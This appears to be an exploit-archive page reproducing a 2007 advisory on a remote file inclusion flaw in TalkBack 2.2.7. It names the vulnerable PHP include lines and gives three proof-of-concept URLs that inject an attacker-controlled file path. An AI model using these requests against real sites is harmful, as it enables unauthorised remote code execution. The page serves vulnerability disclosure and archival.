header-logo
Suggest Exploit
vendor:
TalkBack
by:
NoGe
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: TalkBack
Affected Version From: 2.2.2007
Affected Version To: 2.2.2007
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

TalkBack 2.2.7 Remote File Include Vulnerability

This vulnerability allows an attacker to include malicious files from a remote server, which can lead to remote code execution.

Mitigation:

Update to a patched version of the software or apply a fix provided by the vendor.
Source

Exploit-DB raw data:

==================================================================================================================================

# TalkBack 2.2.7 Remote File Include Vulnerability

    Software      : TalkBack version 2.2.7
    Developer     : http://www.scripts.oldguy.us/talkback
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com
  
==================================================================================================================================


# Vulnerable file
  
    comments-display-tpl.php

    line 35 include $language_file;
    line 172 include $config['comments_form_tpl'];

    addons/separate-comments-mod/my-comments-display-tpl.php

    line 35 include $language_file;



# Exploit

    http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
    http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
    http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]


==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic olibekas ulga Cungkee nyubi k1tk4t bius SiKodoQ newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ Fluzy str0ke
    http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-11-21]

Navigation

Suggest Exploit

Services By CQR